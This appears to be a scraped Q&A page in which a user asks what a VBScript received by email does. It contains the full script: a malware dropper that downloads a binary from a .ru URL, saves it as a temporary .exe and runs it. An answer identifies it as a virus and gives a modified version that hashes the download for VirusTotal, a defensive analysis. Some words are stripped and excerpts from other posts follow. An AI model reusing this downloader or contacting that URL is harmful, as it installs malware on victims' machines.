vbscript - Possible Extortion of Data -

-

someone sent me email vbs script, don't know don't know vbs.

i guessing swindle extort data me, can't tell data. can please exlpain scrtipt do?

sub httpupload( myurl, mypath ) dim objshell set objshell = wscript.createobject( "wscript.shell" ) dim i, objfile, objfso, objhttp, strfile, strmsg const forreading = 1, forwriting = 2, forappending = 8 set objfso = createobject( "scripting.filesystemobject" ) const temporaryfolder = 2 set tfolder = objfso.getspecialfolder(temporaryfolder) tname = objfso.gettempname + ".exe" mypath = tfolder + "/" + tname set objfile = tfolder.createtextfile(tname) set objhttp = createobject( "winhttp.winhttprequest.5.1" ) objhttp.open "get", myurl, false objhttp.send = 1 lenb( objhttp.responsebody )     objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) ) next objfile.close( ) objshell.run(mypath) set objshell = nothing end sub httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

as other guy stated, virus. it's downloading binary data, writing exe , firing off.. modify code below. ... delete email , forget dude. know not "everyone" crazy of when comes finding viruses in wild.. hoard these things , study them.

i've amended changes provide md5 hash , sha256 hash that's searchable on virustotal , delete file after. need re-append line httpupload... , download... if see below removed line attempting use .run method.

httpupload "http://baikalmix.ru/bitrix/js/seo/.../log.php?f=404", ""

the link provided cut off, if still have vbs file, remove whole section of sub httpupload thru end sub right before it... replace entire content of vbs file except line mentioned above.

sub httpupload( myurl, mypath )     dim objshell     set objshell = wscript.createobject( "wscript.shell" )     dim i, objfile, objfso, objhttp, strfile, strmsg     const forreading = 1, forwriting = 2, forappending = 8     set objfso = createobject( "scripting.filesystemobject" )     const temporaryfolder = 2     set tfolder = objfso.getspecialfolder(temporaryfolder)     tname = objfso.gettempname + ".exe"     mypath = tfolder + "/" + tname     set objfile = tfolder.createtextfile(tname)     set objhttp = createobject( "winhttp.winhttprequest.5.1" )     objhttp.open "get", myurl, false     objhttp.send     = 1 lenb( objhttp.responsebody )         objfile.write chr( ascb( midb( objhttp.responsebody, i, 1 ) ) )     next     objfile.close( )     wscript.echo "    md5hash: " & md5hash(spath) & vbcrlf & " sha256hash: " & sha256hash(spath)     set objshell = nothing end sub  function md5hash(spath)     md5hash = bytestohex(md5hashbytes(getbytes(spath))) end function function sha256hash(spath)     sha256hash = bytestohex(sha256hashbytes(getbytes(spath))) end function  function md5hashbytes(abytes)     set objmd5 = createobject("system.security.cryptography.md5cryptoserviceprovider")     objmd5.initialize()     md5hashbytes = objmd5.computehash_2( (abytes) ) end function  function sha256hashbytes(abytes)     'set objsha256 = createobject("system.security.cryptography.md5cryptoserviceprovider")     set objsha256 = createobject("system.security.cryptography.sha256managed")     objsha256.initialize()     sha256hashbytes = objsha256.computehash_2( (abytes) ) end function  function stringtoutfbytes(astring)     set utf8 = createobject("system.text.utf8encoding")     stringtoutfbytes = utf8.getbytes_4(astring) end function  function bytestohex(abytes)     x = 1 lenb(abytes)         hexstr=hex(ascb(midb((abytes), x, 1)))         if len(hexstr) = 1 hexstr ="0" & hexstr         bytestohex=bytestohex & hexstr     next end function  function bytestobase64(varbytes)     createobject("msxml2.domdocument").createelement("b64")         .datatype = "bin.base64"         .nodetypedvalue = varbytes         bytestobase64 = .text     end end function  function getbytes(spath)     createobject("adodb.stream")         .type = 1         .open         .loadfromfile spath         .position = 0         getbytes = .read         .close     end end function

Comments

Post a Comment

Popular posts from this blog

sequelize.js - Sequelize group by with association includes id -

-
so when requesting group sequelize follows: return models.workingcalendar .findall({ attributes: [ 'workingcalendar.periodid', 'workingcalendar.date', 'period.name' ], include: [ { model: models.period, attributes: [] } ], where: { getsudoid: currentgetsudo.id, unitplantid: unitplantid }, group: ['workingcalendar.periodid', 'workingcalendar.date', 'period.name'], }); sequelize run query: select [workingcalendar].[id], [workingcalendar].[periodid], [workingcalendar].[date], [period].[name] [workingcalendars] [workingcalendar] left outer join [periods] [period] on [wor...
Read more

java - Android raising EPERM (Operation not permitted) when attempting to send UDP packet after network connection -

-
when responding supplicant_state_changed_action broadcast , attempting send udp packet, exception: java.net.socketexception: sendto failed: eperm (operation not permitted) @ libcore.io.iobridge.maybethrowaftersendto(iobridge.java:542) @ libcore.io.iobridge.sendto(iobridge.java:511) @ java.net.plaindatagramsocketimpl.send(plaindatagramsocketimpl.java:184) @ java.net.datagramsocket.send(datagramsocket.java:305) @ com.mycompany.app.serviceclass.discover(serviceclass.java:355)at com.mycompany.app.serviceclass.access$600(serviceclass.java:39) @ com.mycompany.app.serviceclass$statemachine.run(serviceclass.java:242) @ java.lang.thread.run(thread.java:818) caused by: android.system.errnoexception: sendto failed: eperm (operation not permitted) @ libcore.io.posix.sendtobytes(native method) @ libcore.io.posix.sendto(posix.java:211) @ libcore.io.blockguardos.sendto(blockguardos.java:278) @ libcore.io.iobridge.sendto(iobridge.java:509) @ java.net.plaindat...
Read more

c++ - Migration from QScriptEngine to QJSEngine -

-
i'm migrating qscriptengine code on qjsengine. now, have: class pars { public: static qscriptvalue printmainlog(qscriptcontext* c, qscriptengine* e); }; qscriptvalue pars::printmainlog(qscriptcontext* c, qscriptengine* e) { //some actions return e->globalobject().property(""); } ... qscriptengine engine; ... engine.globalobject().setproperty("printlog",engine.newfunction(pars::printmainlog)); so, user can put printlog("what ever"); in application in , example, qlineedit , function pars::printmainlog evalute. is there way qjsengine? so, user put same printlog("what ever");? way find here , user should put logger.printlog("what ever"); logger class inherited qobject printlog slot.
Read more